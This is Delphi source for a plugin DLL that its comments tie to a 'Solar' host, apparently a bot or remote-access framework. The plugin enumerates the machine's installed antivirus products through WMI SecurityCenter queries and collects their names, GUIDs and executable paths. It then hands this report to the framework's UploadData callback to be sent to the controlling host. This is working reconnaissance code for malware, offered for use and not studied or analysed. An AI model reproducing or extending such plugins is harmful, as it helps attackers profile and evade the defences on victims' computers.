library GetAntiVirus;

{ This Solar Plugin can get the active antivirus
  name and processes and upload the info to the
  current Solar host}

{Credits to OpCode for the AV info code}

uses
  SysUtils,
  ActiveX,
  ComObj,
  Variants,
  Windows;

//Declare PluginData
Type
  pPluginData = ^tPluginData;
  tPluginData = packed record
    bMainProcess : Boolean;
    bWow64       : Boolean;
    sGUIDA       : array [0..39] of Char;
    UploadData   : Procedure(pUrl : Pointer; pData : Pointer);stdcall;
  end;

Procedure ZeroMem(pPointer : Pointer; dwLen : DWORD);stdcall;
//Zeroes Pointer -> Pointer+dwLen
var
  i : DWORD;
begin
  for i := 0 to (dwLen -1) do
    begin
      pByte(tHandle(pPointer) + i)^ := $00;
    end;
end;

function VarArrayToStr(const vArray: variant): string;
    function _VarToStr(const V: variant): string;
    var
    Vt: integer;
    begin
    Vt := VarType(V);
        case Vt of
          varSmallint,
          varInteger  : Result := IntToStr(integer(V));
          varSingle,
          varDouble,
          varCurrency : Result := FloatToStr(Double(V));
          varDate     : Result := VarToStr(V);
          varOleStr   : Result := WideString(V);
          varBoolean  : Result := VarToStr(V);
          varVariant  : Result := VarToStr(Variant(V));
          varByte     : Result := char(byte(V));
          varString   : Result := String(V);
          varArray    : Result := VarArrayToStr(Variant(V));
        end;
    end;

var
i : integer;
begin
    Result := '[';
     if (VarType(vArray) and VarArray)=0 then
       Result := _VarToStr(vArray)
    else
    for i := VarArrayLowBound(vArray, 1) to VarArrayHighBound(vArray, 1) do
     if i=VarArrayLowBound(vArray, 1)  then
      Result := Result+_VarToStr(vArray[i])
     else
      Result := Result+'|'+_VarToStr(vArray[i]);
    Result:=Result+']';
end;

function VarStrNull(const V:OleVariant):string; //avoid problems with null strings
begin
  Result:='';
  if not VarIsNull(V) then
  begin
    if VarIsArray(V) then
       Result:=VarArrayToStr(V)
    else
    Result:=VarToStr(V);
  end;
end;

function GetWMIObject(const objectName: String): IDispatch; //create the Wmi instance
var
  chEaten: Integer;
  BindCtx: IBindCtx;
  Moniker: IMoniker;
begin
  OleCheck(CreateBindCtx(0, bindCtx));
  OleCheck(MkParseDisplayName(BindCtx, StringToOleStr(objectName), chEaten, Moniker));
  OleCheck(Moniker.BindToObject(BindCtx, nil, IDispatch, Result));
end;

Function GetAntiVirusProductInfo() : String;
var
 objWMIService : OLEVariant;
 colItems      : OLEVariant;
 colItem       : OLEVariant;
 oEnum         : IEnumvariant;
 iValue        : LongWord;
 dwWindows     : DWORD;
 dwMajorVersion: DWORD;
 dwMinorVersion: DWORD;
begin;
 Result := '';

 //Get Windows Version
 dwWindows := Windows.GetVersion;
 dwMajorVersion := Windows.LOBYTE(Windows.LOWORD(dwWindows));
 dwMinorVersion := Windows.HIBYTE(Windows.LOWORD(dwWindows));

 //Get the right securitycenter
 if (dwMajorVersion = 5) and (dwMinorVersion = 1) then
   begin
     objWMIService := GetWMIObject('winmgmts:\\localhost\root\SecurityCenter');
   end
 else
   begin
     objWMIService := GetWMIObject('winmgmts:\\localhost\root\SecurityCenter2');
   end;

 colItems      := objWMIService.ExecQuery('SELECT * FROM AntiVirusProduct','WQL',0);
 oEnum         := IUnknown(colItems._NewEnum) as IEnumVariant;
 while oEnum.Next(1, colItem, iValue) = 0 do
 begin
   Result := Result + Format('displayName                    %s',[VarStrNull(colItem.displayName)]) + #13#10;// String
   Result := Result + Format('instanceGuid                   %s',[VarStrNull(colItem.instanceGuid)]) + #13#10;// String
   Result := Result + Format('pathToSignedProductExe         %s',[VarStrNull(colItem.pathToSignedProductExe)]) + #13#10;// String
   Result := Result + Format('pathToSignedReportingExe       %s',[VarStrNull(colItem.pathToSignedReportingExe)]) + #13#10;// String
 end;
end;

Function PluginStart(pData : pPluginData):Boolean;stdcall;export;
var
  sInfo   : String;
  dwLen   : DWORD;
  sBuffer : array [0..1023] of Byte;
begin
  //Initialize
  ZeroMem(@sBuffer[0], 1024);

  //Get AV Information
  sInfo := GetAntiVirusProductInfo();

  //Check string length
  if (StrLen(pWideChar(sInfo)) > 0) then
    begin
      //Make ANSI string
      Windows.lstrcatA(@sBuffer[0], pAnsiChar(AnsiString(sInfo)));

      //Upload the data
      pData^.UploadData(pAnsiChar(AnsiString('GetAntiVirus')), @sBuffer[0]);
    end;

  //Return True
  Result := True;
end;

Function PluginStop(pData : pPluginData):Boolean;stdcall;export;
begin
  //Return True
  Result := True;
end;

//Make the exports
exports PluginStart;
exports PluginStop;

begin

end.
